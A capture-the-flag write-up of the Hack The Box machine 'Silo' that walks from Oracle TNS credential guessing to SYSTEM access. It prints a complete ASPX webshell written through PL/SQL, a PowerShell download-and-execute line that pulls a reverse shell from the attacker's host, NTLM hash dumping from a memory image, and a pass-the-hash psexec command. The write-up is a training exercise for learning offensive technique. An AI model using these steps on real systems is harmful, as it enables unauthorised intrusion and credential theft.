Silo

Summary

I really like this machine because I had the opportunity to play with the Oracle TNS DB for the first time and learn and use some new tools that helped me on the way. To start off, I will be using this database to upload a webshell on the webserver, which is going to help me get a PowerShell shell. For privilege escalation (privesc), which is the first time I find something like this in an HTB Box, I will be playing with a memory dump file to get a hash that I can use with PassTheHash to get a shell as Administrator. There is an unintended way to get the root flag before even getting a foothold; I will talk about it in Beyond Root..

Enumeration

As always, I begin with the enumeration of ports using nmap:

➜  nmap -p- 10.10.10.82 --min-rate 5000 -oA nmap/silo -v

Scanning 10.10.10.82 [65535 ports]
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 8080/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed Connect Scan at 06:42, 12.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.029s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
8080/tcp  open  http-proxy
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

➜ nmap -sCV 10.10.10.82 -oA nmap/silo_scripts -v
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp  open  http         Oracle XML DB Enterprise Edition httpd
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=XDB
|_http-title: 401 Unauthorized
|_http-server-header: Oracle XML DB/Oracle Database
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-time:
|   date: 2023-12-31T11:48:09
|_  start_date: 2023-12-31T11:18:37
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required

I always like to go for small attack vectors and clear them out so when I go for a wide one, I can be more flexible even with time. For example, web apps have big attack vectors compared to other services. So, I will start with RPC:

➜  rpcclient -U '' -N 10.10.10.82
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

I can't access RPC so I will be moving on to SMB:

➜  ~ smbclient -L //10.10.10.82/
Password for [WORKGROUP\ichyaboy]:
session setup failed: NT_STATUS_ACCESS_DENIED

Same goes for the SMB server. Keeping in mind that if I get any credentials, I can retest these two services.

I went straight for the web app on port 80, where I found nothing useful except the default page of an IIS server (version 8.5). I will start fuzzing the web app to see if there is anything.

➜  gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  --no-error

I didn't find anything, so I will move on to the next web app on port 8080. When accessing this web app, it asks immediately for login before accessing its page. I tried some default credentials, but it didn't work, so I'm leaving this web app aside until I find some creds; maybe then I can log in.

Now I went for the Oracle TNS DB. After reading about this type of database and exploring multiple attack paths, I found this article on Hacktricks (https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) useful.

First I will be enumerating the SID using a tool called odat.

➜  odat python3 odat.py sidguesser -s 10.10.10.82 -p 1521
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...       # | ETA:  00:00:00
100% |#######################################| Time: 00:00:51

XE is a valid SID.

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

Now I will try to get some valid credentials using the passwordguesser argument with odat.

➜  python3 odat.py passwordguesser -d XE -s 10.10.10.82
[+] Valid credentials found: scott/tiger.

Setting Sqlplus up

Since I have valid credentials, I will try to connect to the DB. I will be using sqlplus to connect to the DB, but first, I need to set it up. Following 0xdf's steps, I will need to download:

• instantclient-basic-linux.x64-12.2.0.1.0.zip

• instantclient-sdk-linux.x64-12.2.0.1.0.zip

• instantclient-sqlplus-linux.x64-12.2.0.1.0.zip

unzip em in the same directory then open your terminal source file, in my case it is zsh, and add these lines:

alias sqlplus='/opt/instantclient_12_2/sqlplus'
export PATH=/opt/instantclient_12_2:$PATH
export SQLPATH=/opt/instantclient_12_2
export TNS_ADMIN=/opt/instantclient_12_2
export LD_LIBRARY_PATH=/opt/instantclient_12_2:$LD_LIBRARY_PATH
export ORACLE_HOME=/opt/instantclient_12_2

Then you will be ready to go.

Shell as defaultapppool

➜  sqlplus  scott/tiger@10.10.10.82:1521/XE as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Sun Dec 31 08:41:15 2023

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL>

The "as sysdba" let me connect with system permissions, which facilitate reading through the database and making changes to the database configuration itself. I can see my user's permissions through:

SQL> select * from user_role_privs;

I can see that I have sys perms on the db, so I will try to write an oracle script that leads to reading files.

SQL> declare
  2  f utl_file.file_type;
  3  s varchar(200);
  4  begin
  5  	f:= utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
  6  	utl_file.get_line(f,s);
  7  	utl_file.fclose(f);
  8  	dbms_output.put_line(s);
  9  end;
 10  /

PL/SQL procedure successfully completed.

I successfully wrote and ran that script but I can't see the output so I will activate the serveroutput option.

SQL> set serveroutput ON

then I rerun my script by just running "/"

SQL> /
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

PL/SQL procedure successfully completed.

And now I can read files. I will try to write a file to the root directory of the webapp

SQL> declare
    f utl_file.file_type;
    s varchar(5000) := 'ichyaboy was here';
begin
    f:= utl_file.fopen('/inetpub/wwwroot','test.htm','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/
PL/SQL procedure successfully completed.

➜ curl http://10.10.10.82/test.htm
ichyaboy was here

Going for webshell. I will use the cmd.aspx webshell at /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx but I will remove the styling lines and some unnecessary lines so it will look like this

<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>

SQL> declare
    f utl_file.file_type;
    s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><body ><form id="cmd" method="post" runat="server"><asp:Te  2  xtBox id="txtArg" ru  3  nat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
    f:= utl_file.fopen('/inetpub/wwwroot','givemeshell.aspx','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/
PL/SQL procedure successfully completed.

By accessing http://10.10.10.82/givemeshell.aspx, I can run commands easily from the webshell. However, this shell isn't that much flexible, so I will go for a reverse shell. I will use /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1, rename it to shell.ps1, set up a Python HTTP server, and listen on port 9001.

From the webshell, I will run:

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.14/shell.ps1')"

➜  www python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.82 - - [31/Dec/2023 09:09:09] "GET /shell.ps1 HTTP/1.1" 200 -

➜  ~ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49197
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

PS C:\users\Phineas\Desktop> type user.txt
a48e****************************

Privesc

Beside the user.txt file at Phineas's Desktop there is this Oracle issue.txt file.

PS C:\users\Phineas\Desktop> cat "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
?%Hm8646uC$

I had trouble using the password because I didn't know that the first character was actually wrong due to an encoding issue. So, I will transfer the whole text as base64 to my host machine, then decode it to see what the actual password is.

PS C:\users\Phineas\Desktop> $fc = Get-Content "Oracle issue.txt"            
PS C:\users\Phineas\Desktop> $fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
PS C:\users\Phineas\Desktop> [System.Convert]::ToBase64String($fe)

U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVtcCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRvciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bib3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZzemI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk

➜  cat Oracle\ issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
£%Hm8646uC$

After unzipping the file

➜   file SILO-20180105-221806.dmp
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, version 15.9600, 2 processors, DumpType (0x1), 261996 pages

its a memory dump file, so I will be using volatility to analyze this file but first i need a profile

➜  ./volatility kdbgscan -f SILO-20180105-221806.dmp

Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit)

./volatility -f  SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::

Now I will use psexec from impacket to get a shell as Administrator

➜ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82

C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
fb6b****************************

Beyond Root

Here, I will show how I could simply read the root.txt from the Oracle DB, which is easy. I just need to use the Oracle script I wrote to read files and specify the root.txt path.

SQL> declare
    f utl_file.file_type;
    s varchar(200);
begin
    f:= utl_file.fopen('/Users/Administrator/Desktop','root.txt','R');
    utl_file.get_line(f,s);
    utl_file.fclose(f);
    dbms_output.put_line(s);
end;
/
fb6b****************************

PL/SQL procedure successfully completed.